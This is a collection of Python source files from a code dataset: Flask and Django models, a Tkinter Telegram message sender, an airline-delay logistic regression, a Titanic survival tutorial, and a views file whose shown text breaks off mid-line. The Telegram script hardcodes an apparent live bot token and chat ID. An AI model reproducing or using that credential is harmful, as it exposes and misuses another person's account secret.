{"seq_id":"415776940","text":"from app import db\nfrom sqlalchemy.dialects.postgresql import JSON\n\n\"\"\"\nclass Result(db.Model):\n\t__tablename__ = 'results'\n\n\tid = db.Column(db.Integer, primary_key=True)\n\turl = db.Column(db.String())\n\tresult_all = db.Column(JSON)\n\tresult_no_stop_words = db.Column(JSON)\n\n\tdef __init__(self, url, result_all, result_no_stop_words):\n\t\tself.url = url\n\t\tself.result_all = result_all\n\t\tself.result_no_stop_words = result_no_stop_words\n\n\tdef __repr__(self):\n\t\treturn '<id {}>'.format(self.id)\n\"\"\"\n\nclass User(db.Model):\n\t__tablename__ = 'users'\n\n\tid = db.Column(db.Integer, primary_key=True)\n\temail = db.Column(db.String(120), unique=True)\n\tnickname = db.Column(db.String(120), unique=True)\n\n\tdef __init__(self, email):\n\t\tself.email = email\n\n\tdef __repr__(self):\n\t\treturn '<User %r>' % self.email\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"407238575","text":"# coding=utf-8\nfrom django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef banner(value, arg):\n res = []\n for val in value:\n if val.region == arg:\n res.append(val)\n return res\n","sub_path":"uslugi/templatetags/banners.py","file_name":"banners.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"570498593","text":"from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nimport requests\n\n#This function connects to the Telegram API\ndef enviarDatos():\n #mensajito is the variable where the message is stored\n mensajito = 
 +{"seq_id":"570498593","text":"from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nimport requests\n\n# This function connects to the Telegram Bot API\ndef enviarDatos():\n    # mensajito is the variable that stores the message\n    mensajito = textoComentario.get(1.0, \"end-1c\")\n\n    def comunicacion_escrita(mensaje_bot):\n        token_bot = '1032534984:AAEkVLBp9C8vQRXgZMUMdVt_3IGNqWF7GKc'\n        bot_chatID = '851010840'\n        enviar_com = 'https://api.telegram.org/bot' + token_bot + '/sendMessage?chat_id=' + bot_chatID + '&parse_mode=Markdown&text=' + mensaje_bot\n\n        respuesta = requests.get(enviar_com)\n\n        return respuesta.json()\n\n    enviarCOM = comunicacion_escrita(mensajito)\n    print(enviarCOM)\n\n\napp = tk.Tk() \napp.title(\"Envío Comunicación\")\napp.geometry('600x400')\n\nlabelTop = tk.Label(app,\n                    text = \"Seleccione su Cargo\")\nlabelTop.grid(column=0, row=0)\n\ncomboExample = ttk.Combobox(app, state = \"readonly\",\n                            values=[\"Director/a\", \"Inspector General\", \"Jefe/a de UTP\"]) \nprint(dict(comboExample)) \ncomboExample.grid(column=1, row=1)\ncomboExample.current(0)\n\nprint(comboExample.current(), comboExample.get())\n\n# ----- TODO: concatenate the message (position + full stop + message)\n\ntextoComentario=Text(app, width=30, height=10)\ntextoComentario.grid(row=4, column=2, padx=10, pady=10)\n\n\nEnviarMensaje=Button(app, text=\"Enviar\", width=15, height=2, command=enviarDatos)\nEnviarMensaje.grid(row=5, column=2)\n\nbotonVolver=Button(app, text=\"Cerrar\", width=10, height=1, command=quit)\nbotonVolver.grid(row=5, column=1)\n\n\napp.mainloop()","sub_path":"enviarComunicacion.py","file_name":"enviarComunicacion.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"483826094","text":"from sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nimport numpy as np\nimport time\n# load data and record runtime\nstart_time = time.time()\ndata = pd.read_csv(\"../../data/airlinedelay.csv\")\ndata.dropna(axis = 0, inplace = True)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n#data = data[[\"DayOfWeek\",\"DepTime\",\"AirTime\", \"ArrDelay\", \"DepDelay\", \"Distance\", \"CarrierDelay\", \"WeatherDelay\", \"SecurityDelay\", \"Cancelled\"]]\n#data['ArrDelay'] = np.where(data['ArrDelay'] > 0, 1, 0)\nX = data[[\"DayOfWeek\",\"DepTime\",\"AirTime\", \"DepDelay\", \"Distance\", \"CarrierDelay\", \"WeatherDelay\", \"SecurityDelay\", \"Cancelled\"]]\ny = data[\"ArrDelay\"]\n# binarize the target: LogisticRegression expects discrete class labels, not raw delay minutes\ny = np.where(y > 0, 1, 0)\nscaler = StandardScaler()\nX_std = scaler.fit_transform(X)\n\n\nclf = LogisticRegression(random_state=0)\nstart_time = time.time()\n# Train model\nmodel = clf.fit(X_std, y)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n","sub_path":"Project/code/local/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
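The flight.py record above scales features and fits the classifier as two separate steps; sklearn's Pipeline ties them into a single estimator so the scaler is always fitted on the same rows as the model. A minimal sketch on synthetic data (shapes and values are illustrative, not the airline dataset):

# Sketch: StandardScaler + LogisticRegression chained into one estimator.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)
X_demo = rng.normal(size=(100, 3))        # 100 rows, 3 synthetic features
y_demo = (X_demo[:, 0] > 0).astype(int)   # toy binary target
pipe = make_pipeline(StandardScaler(), LogisticRegression(random_state=0))
pipe.fit(X_demo, y_demo)
print(pipe.score(X_demo, y_demo))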
 +{"seq_id":"295485395","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep  3 15:56:16 2019\r\n\r\n@author: ahmetd\r\n\"\"\"\r\n\r\n# data analysis and wrangling\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random as rnd\r\n\r\n# visualization\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n# %matplotlib inline\r\n\r\n# machine learning\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC, LinearSVC\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.linear_model import Perceptron\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\ntrain_df = pd.read_csv(r'C:\\MyPython\\titanic\\train.csv')\r\ntest_df = pd.read_csv(r'C:\\MyPython\\titanic\\test.csv')\r\ncombine = [train_df, test_df]\r\n\r\nprint(train_df.columns.values)\r\n# Categorical: Survived, Sex, and Embarked. Ordinal: Pclass.\r\n# Continuous: Age, Fare. Discrete: SibSp, Parch.\r\n\r\n# preview the data\r\ntrain_df.head()\r\nprint (train_df.Ticket)\r\n\r\n# mixed data types:\r\n# Ticket is a mix of numeric and alphanumeric data types. Cabin is alphanumeric.\r\n# These are candidates for correcting\r\ntrain_df.tail()\r\n\r\n# blank, null or empty values\r\n\r\ntype (train_df[\"Age\"])\r\n\r\nfor i in range (train_df[\"Age\"].size):\r\n    entry = train_df.Age[i]\r\n#    print (entry)\r\n    if str(entry) == \"nan\": \r\n        print (\"null entry in: \", i)\r\n    elif float(entry) != entry: \r\n        print (\"weird entry in: \", i)\r\n    \r\n# Cabin > Age > Embarked features contain a number of null values in that order for the training dataset.\r\n# Cabin > Age are incomplete in case of test dataset. \r\n\r\ntrain_df.info()\r\ntest_df.info() \r\n# Age and Cabin lots of missing in test. so not to be used as features? \r\n# and fare is one missing in test\r\n\r\ntrain_df.describe()\r\ntrain_df.describe(include=['O']) # includes categorical features\r\n\r\n# complete and use Age feature as it is definitely correlated to survival.\r\n# complete and use the Embarked feature as it may also correlate with survival or another important feature.\r\n# PassengerId may be dropped from training dataset as it does not contribute to survival.\r\n# Name feature may be dropped. Does the number of letters in a name mean something, like wealth?\r\n\r\n# create new feature called Family based on Parch and SibSp to get total count of family members on board.\r\n# engineer the Name feature to extract Title as a new feature.\r\n# create a Fare range feature if it helps our analysis.\r\n\r\n# classifying:\r\n# Women (Sex=female) were more likely to have survived.\r\n# Children (Age<=4) were more likely to have survived.\r\n# We observe significant correlation (>0.5) among Pclass=1 and Survived (classifying #3). We decide to include this feature in our model.\r\n\r\ntrain_df[[\"Sex\", \"Survived\"]].groupby(['Sex'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n# Sex=female had very high survival rate at 74% \r\n\r\ntrain_df[[\"SibSp\", \"Survived\"]].groupby(['SibSp'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\ntrain_df[[\"Parch\", \"Survived\"]].groupby(['Parch'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n# SibSp and Parch: these features have zero correlation for certain values. \r\n# It may be best to derive a feature or a set of features from these individual features\r\n\r\ng = sns.FacetGrid(train_df, col='Survived')\r\ng.map(plt.hist, 'Age', bins=20)\r\n# Observations:\r\n# Infants (Age <=4) had high survival rate. Oldest passengers (Age = 80) survived.\r\n# Large number of 15-25 year olds did not survive. 
Most passengers are in 15-35 age range.\r\n\r\n# We will consider Age (our assumption classifying #2) in our model training.\r\n# will Complete the Age feature for null values (completing #1).\r\n# We should band age groups (creating #3).\r\n\r\n\r\n\r\n\r\n# correlating numerical and ordinal features:\r\n# grid = sns.FacetGrid(train_df, col='Pclass', hue='Survived')\r\ngrid = sns.FacetGrid(train_df, col='Survived', row='Pclass', size=2.2, aspect=1.6)\r\ngrid.map(plt.hist, 'Age', alpha=.5, bins=20)\r\ngrid.add_legend();\r\n# Pclass must be considered for model training\r\n\r\n\r\n\r\n\r\n# Correlating categorical features:\r\n# grid = sns.FacetGrid(train_df, col='Embarked')\r\ngrid = sns.FacetGrid(train_df, row='Embarked', size=2.2, aspect=1.6)\r\ngrid.map(sns.pointplot, 'Pclass', 'Survived', 'Sex', palette='deep')\r\ngrid.add_legend()\r\n# Female passengers had much better survival rate than males. Exception in Embarked=C\r\n# Add Sex feature to model training.\r\n# Complete and add Embarked feature to model training.\r\n\r\n\r\n\r\n\r\n# Correlating categorical and numerical features¶\r\n# consider correlating Embarked (Categorical non-numeric), Sex (Categorical non-numeric), \r\n# Fare (Numeric continuous), with Survived (Categorical numeric).\r\n# grid = sns.FacetGrid(train_df, col='Embarked', hue='Survived', palette={0: 'k', 1: 'w'})\r\ngrid = sns.FacetGrid(train_df, row='Embarked', col='Survived', size=2.2, aspect=1.6)\r\ngrid.map(sns.barplot, 'Sex', 'Fare', alpha=.5, ci=None)\r\ngrid.add_legend()\r\n# Higher fare paying passengers had better survival.\r\n# Port of embarkation correlates with survival rates\r\n# Consider banding Fare feature.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# we want to drop the Cabin (correcting #2) and Ticket (correcting #1) features.\r\n# IMPORTANT perform operations on both training and testing datasets\r\nprint(\"Before\", train_df.shape, test_df.shape, combine[0].shape, combine[1].shape)\r\n\r\ntrain_df = train_df.drop(['Ticket', 'Cabin'], axis=1)\r\ntest_df = test_df.drop(['Ticket', 'Cabin'], axis=1)\r\ncombine = [train_df, test_df]\r\n\r\nprint(\"After\", train_df.shape, test_df.shape, combine[0].shape, combine[1].shape)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# extract Title feature from Name using regular expressions.\r\n# RegEx pattern (\\w+\\.) matches the first word which ends with a dot character within Name feature. \r\n# The expand=False flag returns a DataFrame.\r\nfor dataset in combine:\r\n dataset['Title'] = dataset.Name.str.extract(' ([A-Za-z]+)\\.', expand=False)\r\n\r\npd.crosstab(train_df['Title'], train_df['Sex'])\r\n# if we plot Title, Age, and Survived, we note the following observations:\r\n# Most titles band Age groups accurately. 
For example: Master title has Age mean of 5 years.\r\n# Survival among Title Age bands varies slightly.\r\n# Certain titles mostly survived (Mme, Lady, Sir) or did not (Don, Rev, Jonkheer).\r\n\r\n# keep the new Title feature for model training.\r\n\r\n\r\n# replace many titles with a more common name or classify them as Rare.\r\nfor dataset in combine:\r\n    dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col',\\\r\n \t'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare')\r\n\r\n    dataset['Title'] = dataset['Title'].replace('Mlle', 'Miss')\r\n    dataset['Title'] = dataset['Title'].replace('Ms', 'Miss')\r\n    dataset['Title'] = dataset['Title'].replace('Mme', 'Mrs')\r\n    \r\ntrain_df[['Title', 'Survived']].groupby(['Title'], as_index=False).mean()\r\n\r\n\r\n\r\n# convert the categorical titles to ordinal.\r\ntitle_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Rare\": 5}\r\nfor dataset in combine:\r\n    dataset['Title'] = dataset['Title'].map(title_mapping)\r\n    dataset['Title'] = dataset['Title'].fillna(0)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n# drop the Name feature from training and testing datasets. \r\n# We also do not need the PassengerId feature in the training dataset.\r\ntrain_df = train_df.drop(['Name', 'PassengerId'], axis=1)\r\ntest_df = test_df.drop(['Name'], axis=1)\r\ncombine = [train_df, test_df]\r\ntrain_df.shape, test_df.shape\r\n\r\n\r\n# convert categorical features which contain strings to numerical values\r\n# converting Sex feature to a new feature called Gender where female=1 and male=0.\r\nfor dataset in combine:\r\n    dataset['Sex'] = dataset['Sex'].map( {'female': 1, 'male': 0} ).astype(int)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n
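A one-line check of the Title extraction used above, on the first passenger name from the training set (output shown as a comment):

# The pattern grabs the word ending in a dot, i.e. the honorific.
import pandas as pd
names = pd.Series(["Braund, Mr. Owen Harris"])
print(names.str.extract(' ([A-Za-z]+)\.', expand=False)[0])  # -> Mr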
# Completing a numerical continuous feature\r\n# Guess Age using median values for Age across sets of Pclass and Gender feature combinations. \r\n# grid = sns.FacetGrid(train_df, col='Pclass', hue='Gender')\r\ngrid = sns.FacetGrid(train_df, row='Pclass', col='Sex', size=2.2, aspect=1.6)\r\ngrid.map(plt.hist, 'Age', alpha=.5, bins=20)\r\ngrid.add_legend()\r\n# prepare an empty array to contain guessed Age values based on Pclass x Gender combinations.\r\nguess_ages = np.zeros((2,3))\r\nguess_ages\r\n# iterate over Sex (0 or 1) and Pclass (1, 2, 3) to calculate guessed values of Age for the six combinations.\r\nfor dataset in combine:\r\n    for i in range(0, 2):\r\n        for j in range(0, 3):\r\n            guess_df = dataset[(dataset['Sex'] == i) & \\\r\n                                  (dataset['Pclass'] == j+1)]['Age'].dropna()\r\n\r\n            # age_mean = guess_df.mean()\r\n            # age_std = guess_df.std()\r\n            # age_guess = rnd.uniform(age_mean - age_std, age_mean + age_std)\r\n\r\n            age_guess = guess_df.median()\r\n\r\n            # Convert random age float to nearest .5 age\r\n            guess_ages[i,j] = int( age_guess/0.5 + 0.5 ) * 0.5\r\n            \r\n    for i in range(0, 2):\r\n        for j in range(0, 3):\r\n            dataset.loc[ (dataset.Age.isnull()) & (dataset.Sex == i) & (dataset.Pclass == j+1),\\\r\n                    'Age'] = guess_ages[i,j]\r\n\r\n    dataset['Age'] = dataset['Age'].astype(int)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n# create Age bands and determine correlations with Survived.\r\ntrain_df['AgeBand'] = pd.cut(train_df['Age'], 5)\r\ntrain_df[['AgeBand', 'Survived']].groupby(['AgeBand'], as_index=False).mean().sort_values(by='AgeBand', ascending=True)\r\n# replace Age with ordinals based on these bands.\r\nfor dataset in combine:    \r\n    dataset.loc[ dataset['Age'] <= 16, 'Age'] = 0\r\n    dataset.loc[(dataset['Age'] > 16) & (dataset['Age'] <= 32), 'Age'] = 1\r\n    dataset.loc[(dataset['Age'] > 32) & (dataset['Age'] <= 48), 'Age'] = 2\r\n    dataset.loc[(dataset['Age'] > 48) & (dataset['Age'] <= 64), 'Age'] = 3\r\n    dataset.loc[ dataset['Age'] > 64, 'Age'] = 4  # top band: ages over 64\r\ntrain_df.head()\r\n#We can now remove the AgeBand feature.\r\ntrain_df = train_df.drop(['AgeBand'], axis=1)\r\ncombine = [train_df, test_df]\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n# Creating new features combining existing features\r\n# create new feature for FamilySize which combines Parch and SibSp. \r\n# and drop Parch and SibSp from our datasets.\r\nfor dataset in combine:\r\n    dataset['FamilySize'] = dataset['SibSp'] + dataset['Parch'] + 1\r\n\r\ntrain_df[['FamilySize', 'Survived']].groupby(['FamilySize'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n# create another feature called IsAlone.\r\nfor dataset in combine:\r\n    dataset['IsAlone'] = 0\r\n    dataset.loc[dataset['FamilySize'] == 1, 'IsAlone'] = 1\r\n\r\ntrain_df[['IsAlone', 'Survived']].groupby(['IsAlone'], as_index=False).mean()\r\n# drop Parch, SibSp, and FamilySize features in favor of IsAlone.\r\ntrain_df = train_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1)\r\ntest_df = test_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1)\r\ncombine = [train_df, test_df]\r\n\r\ntrain_df.head()\r\n# create an artificial feature combining Pclass and Age.\r\nfor dataset in combine:\r\n    dataset['Age*Class'] = dataset.Age * dataset.Pclass\r\n\r\ntrain_df.loc[:, ['Age*Class', 'Age', 'Pclass']].head(10)\r\n\r\n\r\n\r\n\r\n
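AgeBand above uses pd.cut (equal-width intervals), while FareBand further down uses pd.qcut (equal-frequency quantiles). A tiny sketch of the difference on made-up numbers:

# cut splits the value range evenly; qcut splits the observations evenly.
import pandas as pd
vals = pd.Series([1, 2, 3, 4, 5, 6, 7, 8, 9, 100])
print(pd.cut(vals, 2).value_counts())   # width-based: 9 values in the low bin, 1 in the high
print(pd.qcut(vals, 2).value_counts())  # quantile-based: 5 values in each bin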
# Completing a categorical feature\r\n# Embarked feature takes S, Q, C values based on port of embarkation. \r\n# Our training dataset has two missing values. \r\n# We simply fill these with the most common occurrence.\r\nfreq_port = train_df.Embarked.dropna().mode()[0]\r\nfreq_port\r\n\r\nfor dataset in combine:\r\n    dataset['Embarked'] = dataset['Embarked'].fillna(freq_port)\r\n    \r\ntrain_df[['Embarked', 'Survived']].groupby(['Embarked'], \r\n        as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n\r\n\r\n\r\n\r\n# Converting categorical feature to numeric\r\n# now convert the EmbarkedFill feature by creating a new numeric Port feature.\r\nfor dataset in combine:\r\n    dataset['Embarked'] = dataset['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n# Quick completing and converting a numeric feature\r\n# complete the Fare feature for single missing value in test dataset \r\n# we are not creating an intermediate new feature or doing any further analysis \r\n# for correlation to guess missing feature as we are replacing only a single value. \r\ntest_df['Fare'].fillna(test_df['Fare'].dropna().median(), inplace=True)\r\ntest_df.head()\r\n# create FareBand.\r\ntrain_df['FareBand'] = pd.qcut(train_df['Fare'], 4)\r\ntrain_df[['FareBand', 'Survived']].groupby(['FareBand'], as_index=False).mean().sort_values(by='FareBand', ascending=True)\r\n\r\n# Convert the Fare feature to ordinal values based on the FareBand.\r\nfor dataset in combine:\r\n    dataset.loc[ dataset['Fare'] <= 7.91, 'Fare'] = 0\r\n    dataset.loc[(dataset['Fare'] > 7.91) & (dataset['Fare'] <= 14.454), 'Fare'] = 1\r\n    dataset.loc[(dataset['Fare'] > 14.454) & (dataset['Fare'] <= 31), 'Fare']   = 2\r\n    dataset.loc[ dataset['Fare'] > 31, 'Fare'] = 3\r\n    dataset['Fare'] = dataset['Fare'].astype(int)\r\n\r\ntrain_df = train_df.drop(['FareBand'], axis=1)\r\ncombine = [train_df, test_df]\r\n    \r\ntrain_df.head(10)\r\ntest_df.head(10)\r\n\r\n\r\n\r\n\r\n#### Model, prediction and solving\r\n# train a model and predict the required solution\r\n# Our problem is a classification and regression problem.\r\n# We want to identify the relationship between output (Survived or not) with other variables or features (Gender, Age, Port...).\r\n# We are also performing a category of machine learning which is called \r\n# supervised learning as we are training our model with a given dataset. \r\n\r\n# Supervised Learning plus Classification and Regression, ==> a few models\r\nX_train = train_df.drop(\"Survived\", axis=1)\r\nY_train = train_df[\"Survived\"]\r\nX_test  = test_df.drop(\"PassengerId\", axis=1).copy()\r\nX_train.shape, Y_train.shape, X_test.shape\r\n\r\n\r\n\r\n\r\n\r\n#1 Logistic Regression\r\nlogreg = LogisticRegression()\r\nlogreg.fit(X_train, Y_train)\r\nY_pred = logreg.predict(X_test)\r\nacc_log = round(logreg.score(X_train, Y_train) * 100, 2)\r\nacc_log\r\n\r\n# Positive coefficients increase the log-odds of the response (and thus increase the probability)\r\ncoeff_df = pd.DataFrame(train_df.columns.delete(0))\r\ncoeff_df.columns = ['Feature']\r\ncoeff_df[\"Correlation\"] = pd.Series(logreg.coef_[0])\r\n\r\ncoeff_df.sort_values(by='Correlation', ascending=False)\r\n# Sex is highest positive coefficient, implying as the Sex value increases \r\n# (male: 0 to female: 1), the probability of Survived=1 increases the most.\r\n# as Pclass increases, probability of Survived=1 decreases the most.\r\n# Age*Class is a good artificial feature to model as it has second highest \r\n# negative correlation with Survived. So is Title as second highest positive correlation.
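The coefficients above are log-odds; exponentiating turns them into odds ratios, which are often easier to read. A short sketch reusing the logreg and X_train fitted above:

# np.exp(coef) is the multiplicative change in odds per unit increase of a feature.
import numpy as np
odds = np.exp(logreg.coef_[0])
print(dict(zip(X_train.columns, np.round(odds, 3))))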
\r\n\r\n\r\n\r\n\r\n\r\n#2 Support Vector Machines\r\nsvc = SVC()\r\nsvc.fit(X_train, Y_train)\r\nY_pred = svc.predict(X_test)\r\nacc_svc = round(svc.score(X_train, Y_train) * 100, 2)\r\nacc_svc\r\n# this model generates a confidence score higher than Logistic Regression\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#3 k-Nearest Neighbors algorithm (or k-NN for short) is a \r\n# non-parametric method used for classification and regression\r\nknn = KNeighborsClassifier(n_neighbors = 3)\r\nknn.fit(X_train, Y_train)\r\nY_pred = knn.predict(X_test)\r\nacc_knn = round(knn.score(X_train, Y_train) * 100, 2)\r\nacc_knn\r\n\r\n# KNN confidence score is better than Logistic Regression but worse than SVM\r\n\r\n\r\n\r\n\r\n\r\n#4 naive Bayes classifiers are a family of simple probabilistic classifiers based on applying Bayes' theorem\r\n# Gaussian Naive Bayes\r\n\r\ngaussian = GaussianNB()\r\ngaussian.fit(X_train, Y_train)\r\nY_pred = gaussian.predict(X_test)\r\nacc_gaussian = round(gaussian.score(X_train, Y_train) * 100, 2)\r\nacc_gaussian\r\n# confidence score is the lowest among the models\r\n\r\n\r\n\r\n\r\n\r\n\r\n#5 perceptron is an algorithm for supervised learning of binary classifiers\r\nperceptron = Perceptron()\r\nperceptron.fit(X_train, Y_train)\r\nY_pred = perceptron.predict(X_test)\r\nacc_perceptron = round(perceptron.score(X_train, Y_train) * 100, 2)\r\nacc_perceptron\r\n\r\n\r\n\r\n\r\n\r\n\r\n#6 # Linear SVC\r\n\r\nlinear_svc = LinearSVC()\r\nlinear_svc.fit(X_train, Y_train)\r\nY_pred = linear_svc.predict(X_test)\r\nacc_linear_svc = round(linear_svc.score(X_train, Y_train) * 100, 2)\r\nacc_linear_svc\r\n\r\n\r\n\r\n\r\n\r\n#7 Stochastic Gradient Descent\r\nsgd = SGDClassifier()\r\nsgd.fit(X_train, Y_train)\r\nY_pred = sgd.predict(X_test)\r\nacc_sgd = round(sgd.score(X_train, Y_train) * 100, 2)\r\nacc_sgd\r\n\r\n\r\n\r\n\r\n\r\n#8 # Decision Tree\r\n\r\ndecision_tree = DecisionTreeClassifier()\r\ndecision_tree.fit(X_train, Y_train)\r\nY_pred = decision_tree.predict(X_test)\r\nacc_decision_tree = round(decision_tree.score(X_train, Y_train) * 100, 2)\r\nacc_decision_tree\r\n\r\n\r\n\r\n\r\n#9 Random Forest\r\n\r\nrandom_forest = RandomForestClassifier(n_estimators=100)\r\nrandom_forest.fit(X_train, Y_train)\r\nY_pred = random_forest.predict(X_test)\r\nrandom_forest.score(X_train, Y_train)\r\nacc_random_forest = round(random_forest.score(X_train, Y_train) * 100, 2)\r\nacc_random_forest\r\n\r\n\r\n\r\n\r\n##### Model evaluation\r\nmodels = pd.DataFrame({\r\n    'Model': ['Support Vector Machines', 'KNN', 'Logistic Regression', \r\n              'Random Forest', 'Naive Bayes', 'Perceptron', \r\n              'Stochastic Gradient Descent', 'Linear SVC', \r\n              'Decision Tree'],\r\n    'Score': [acc_svc, acc_knn, acc_log, \r\n              acc_random_forest, acc_gaussian, acc_perceptron, \r\n              acc_sgd, acc_linear_svc, acc_decision_tree]})\r\nmodels.sort_values(by='Score', ascending=False)\r\n# While both Decision Tree and Random Forest score the same, \r\n# we choose to use Random Forest as they correct for decision trees' \r\n# habit of overfitting to their training set.\r\n\r\n\r\nsubmission = pd.DataFrame({\r\n        \"PassengerId\": test_df[\"PassengerId\"],\r\n        \"Survived\": Y_pred\r\n    })\r\n\r\nsubmission.to_csv(r'C:\\MyPython\\titanic\\submission.csv', index=False)\r\nprint (submission) 
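The scores above are computed on the training set, which flatters models that memorize it (the Decision Tree and Random Forest in particular). A fairer comparison is k-fold cross-validation; a short sketch reusing X_train and Y_train from above:

# 5-fold CV: each fold is scored on rows the model never saw during fitting.
from sklearn.model_selection import cross_val_score
from sklearn.ensemble import RandomForestClassifier
cv_scores = cross_val_score(RandomForestClassifier(n_estimators=100), X_train, Y_train, cv=5)
print(cv_scores.mean(), cv_scores.std())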
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":18100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58568671","text":"from django.db import models\n\n# Create your models here.\n\nclass Sector(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n class Meta:\n verbose_name =\"sector\"\n verbose_name_plural = \"sectores\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\nclass Comments(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n email = models.CharField(max_length=200,verbose_name=\"Email\")\n message = models.TextField(verbose_name=\"Mensaje\")\n class Meta:\n verbose_name =\"comentario\"\n verbose_name_plural = \"comentarios\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n \nclass Family(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n sector = models.ForeignKey(Sector,verbose_name=\"sector\",on_delete=models.CASCADE)\n class Meta:\n verbose_name =\"familia\"\n verbose_name_plural = \"familias\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\nclass Activity(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n family = models.ForeignKey(Family,verbose_name=\"familia\",on_delete=models.CASCADE)\n class Meta:\n verbose_name =\"actividad\"\n verbose_name_plural = \"actividades\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\nclass Level(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n credits_min = models.IntegerField()\n class Meta:\n verbose_name =\"nivel\"\n verbose_name_plural = \"niveles\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\nclass Program(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n code = models.CharField(max_length=10,verbose_name=\"Código\")\n activity = models.ForeignKey(Activity,verbose_name=\"actividad\",on_delete=models.CASCADE)\n level = models.ForeignKey(Level,verbose_name=\"nivel\",on_delete=models.CASCADE)\n class Meta:\n verbose_name =\"programa\"\n verbose_name_plural = \"programas\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\nclass Institute(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n code = models.CharField(max_length=10,verbose_name=\"Código\")\n programs = models.ManyToManyField(Program,verbose_name=\"Programas\")\n class Meta:\n verbose_name =\"instituto\"\n verbose_name_plural = \"institutos\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\n","sub_path":"qualifications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"452455528","text":"from django.shortcuts import render\nfrom views_api import *\n\n# Create your views here.\ndef PortalMain(request, page):\n if page == 'profile':\n api_url = 
